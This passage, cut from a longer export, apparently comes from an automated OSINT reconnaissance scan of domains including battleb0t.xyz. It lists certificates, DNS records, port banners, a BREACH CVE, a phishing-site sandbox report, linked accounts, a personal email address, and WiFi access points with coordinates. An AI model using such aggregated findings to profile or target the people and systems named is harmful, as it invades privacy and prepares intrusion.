"axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan11 (Net ID: 00:02:6F:04:8F:04) | 37.7642, -122.3993 |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcalendars.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | giters (Category: coding)
https://giters.com/Altpapier | Altpapier |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NETGEAR (Net ID: 00:09:5B:6A:9E:4C) | 39.0469, -77.4903 |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-oo2.github.io | 185.199.111.153 |
| 2023-05-12 03:14:48 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | www.ayhu.xyz |
| 2023-05-12 03:09:03 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.105 | 87.248.157.102 |
| 2023-05-12 02:45:07 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 2606:50c0:8001::153 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00tau.github.io]
https://www.openphish.com/feed.txt | 00tau.github.io |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | codementor (Category: coding)
https://www.codementor.io/@login | login |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | scratch (Category: coding)
https://scratch.mit.edu/users/patrickpogoda/ | patrickpogoda |
| 2023-05-12 02:53:10 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 3 | 0 | None | None None | vscode.battleb0t.xyz |
| 2023-05-12 02:59:53 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | banksean@gmail.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://g.width/386,g.getcontext(m', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://math.pi/e,n=this.or.v,i=this.os.v,a=2*math.pi*n/(4*e),o=.5*-math.pi,s=3===this.data.d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://maskwallets.xyz/forms/v2.js', u'type': u'visited', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://maskwallets.xyz/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3252"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_cb4_IESQMMUTEX_0_519"\n "IsoScope_cb4_ConnHashTable<3252>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_cb4_IESQMMUTEX_0_303"\n "IsoScope_cb4_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_cb4_IE_EarlyTabStart_0xb2c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"154.82.100.125:80"\n "172.217.164.106:443"\n "142.251.46.234:80"\n "142.250.189.163:80"\n "43.251.41.15:443"\n "104.17.211.243:443"\n "142.251.214.132:443"\n "142.251.32.35:443"\n "104.17.212.243:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "142.250.189.163:443"\n "185.199.110.153:443"\n "208.89.12.87:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"maskwallets.xyz"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: maskwallets.xyz\nDNT: 1\nConnection: Keep-Alive\nCookie: _ga=GA1.2.1689897167.1682546284; _gid=GA1.2.304489594.1682546284; _gat_gtag_UA_37075177_6=1; LPVID=EwOTcwNTgwYTNiMjZiNTE2; LPSID-88982875=upHQCJz-TiCz5i-z2-4hWg"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "ajax.googleapis.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "maskwallets.xyz"\n "metamask.io"\n "perf.hsforms.com"\n "va.v.liveperson.net"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_1_.js")\n Found string ".w-widget-twitter {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim * {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-clear {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical) {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "payload_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 300x300 components 3" and extension "jpg"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-uniswap_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-gitcoin_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "info_2x_1_.png" has type "Unknown" and extension "png"\n "image_2x_1_.png" has type "Unknown" and extension "png"\n "refresh_2x_1_.png" has type "Unknown" and extension "png"\n "undo_2x_1_.png" has type "Unknown" and extension "png"\n "audio_2x_1_.png" has type "Unknown" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab4009.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab4009.tmp]- [targetUID: 00000000-00003016]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 dat |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RPOWER1 (Net ID: 00:02:6F:B3:3B:A8) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5d0de95ea502c0-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Steam (Category: gaming)
https://steamcommunity.com/id/battleb0t | battleb0t |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | ondigitalocean.com |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:a2:98:ee:7c:0f:82:53:85:c9:ed:86:47:94:a7:aa:74:64
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:54:05 2023 GMT
Not After : Apr 27 17:54:04 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d2:cd:d6:7e:84:63:03:a9:a4:54:af:d4:a6:67:
cf:f7:3e:0c:ab:80:9d:a8:22:bf:ee:64:c0:1e:dd:
e1:9d:29:3b:aa:bb:b6:1a:dd:d0:c3:5d:15:61:c8:
eb:00:a8:62:02:a5:c4:0c:4d:3a:56:20:d3:19:1c:
24:d9:21:05:da:7b:34:cd:5b:3f:9f:3f:ff:56:cb:
60:a2:2a:6a:1f:63:a5:f7:6c:bc:e6:cd:4b:7c:cb:
c6:0b:ba:27:31:61:c2:7b:47:19:7b:f1:52:41:68:
44:d8:1a:a5:11:c2:d5:cd:2d:49:92:07:b0:5c:c3:
2d:0c:54:f4:e5:8e:0a:3e:0a:05:99:5f:e9:65:18:
80:c0:5e:b2:87:08:2d:60:b2:01:35:c9:41:a1:4e:
56:80:bc:0b:2d:89:62:c9:e1:19:f4:a9:de:a5:de:
27:dd:96:99:29:26:9e:36:03:45:4b:bf:4a:de:ef:
5f:47:82:05:6f:ed:a1:4f:34:05:75:05:59:d0:32:
a2:22:c4:9d:5a:65:cd:6b:45:d7:7f:45:90:2e:36:
4c:3d:0a:62:83:36:a6:3c:d9:df:00:c7:cb:10:68:
6e:0c:d8:9c:a6:a5:e6:32:7b:12:0d:1c:1f:90:20:
a5:a7:c9:da:be:0f:96:fe:30:6b:29:55:ac:4a:68:
7b:12:dd:43:df:cf:f5:49:87:8c:9b:38:92:62:52:
c6:f8:97:d4:43:d6:ed:cb:66:79:5b:c9:60:9e:db:
33:f0:59:fb:fd:35:62:83:55:b5:65:04:20:55:ee:
82:6d:de:85:c1:18:ed:8c:10:29:47:46:ee:2a:eb:
57:cd:b1:5e:14:a7:37:00:58:3a:35:9d:fe:99:73:
d6:cd:b6:67:17:f6:27:29:ea:32:96:67:c8:fa:43:
a3:c2:cc:ca:bb:cb:87:e5:76:db:8a:de:bc:58:c7:
6c:12:6a:a6:93:1b:0a:ce:07:98:f7:7c:0d:1d:5e:
2a:ac:2b:fb:17:f1:cb:e0:a5:02:67:2b:3d:67:81:
d8:de:3e:15:6a:f0:a0:0d:64:2d:0e:9b:55:1e:1b:
69:69:5a:ae:14:c6:1c:ce:8e:c5:fd:2c:25:74:92:
c1:35:de:00:ee:bc:fa:5d:88:f2:17:fe:70:37:3b:
3b:f5:14:3a:4b:f4:50:a9:91:31:99:48:3f:9e:c6:
ad:0b:a6:89:2d:77:db:fb:64:f8:31:9a:82:d1:cd:
f7:6a:51:a4:b7:d3:da:23:3d:ff:2a:45:de:3b:b5:
32:78:69:cd:54:60:d3:2a:39:e1:61:db:5a:d2:78:
94:77:f6:b5:99:c5:b9:3c:95:4b:75:db:f8:2b:d4:
ad:de:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:62:E5:21:FA:E8:50:FB:CE:5D:D2:7E:68:EA:9B:E0:B1:2E:4D:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
15:ef:a6:fd:ef:21:53:78:53:f6:e6:7d:e0:a9:be:9a:f4:2a:
f3:6b:f8:45:b0:1e:92:39:ea:7f:20:4e:9d:7e:15:34:36:61:
5c:46:2f:03:80:59:84:da:ef:66:78:da:e7:b0:f0:dc:e6:6a:
c6:b2:06:d7:47:db:11:48:d1:1f:c9:fd:2b:78:20:9d:86:11:
3b:e4:51:10:b8:54:d7:6e:6f:db:ce:56:14:fa:f5:79:05:a8:
02:0b:cb:0a:18:31:3a:e9:dd:4b:c7:d7:53:e4:2f:bc:37:98:
11:c7:a5:55:7f:64:7e:ee:5a:1d:86:0e:38:0c:bd:8e:2a:bd:
3e:16:9b:63:5f:9f:06:9d:58:f3:3d:71:94:e6:c1:49:68:5e:
41:22:f6:d4:2e:f7:b9:62:b8:3b:2f:c1:c6:66:8c:a7:82:e0:
40:ef:66:13:cd:53:80:bc:ca:bc:49:c0:67:81:c8:1d:d8:f5:
37:5a:da:e3:56:36:cd:fd:cb:00:ce:97:33:4d:b7:29:cd:90:
4e:43:37:62:d7:92:39:fa:36:a2:59:0a:4f:35:fa:8e:5a:01:
29:c9:4e:6f:ae:1d:31:a2:f5:71:7f:a1:e1:58:17:ea:74:b0:
26:53:2b:a4:97:e8:9a:a1:10:a9:a5:e1:7b:21:18:15:30:ae:
dd:15:ba:8d
|
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | GitHub (Category: coding)
https://github.com/battleb0t | battleb0t |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.113 | 35.229.48.116 |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 213.30.196.104.bc.googleusercontent.com | 104.196.30.213 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:0E:F4:FC) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:37:29 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [207.154.228.169] | 207.154.228.169 |
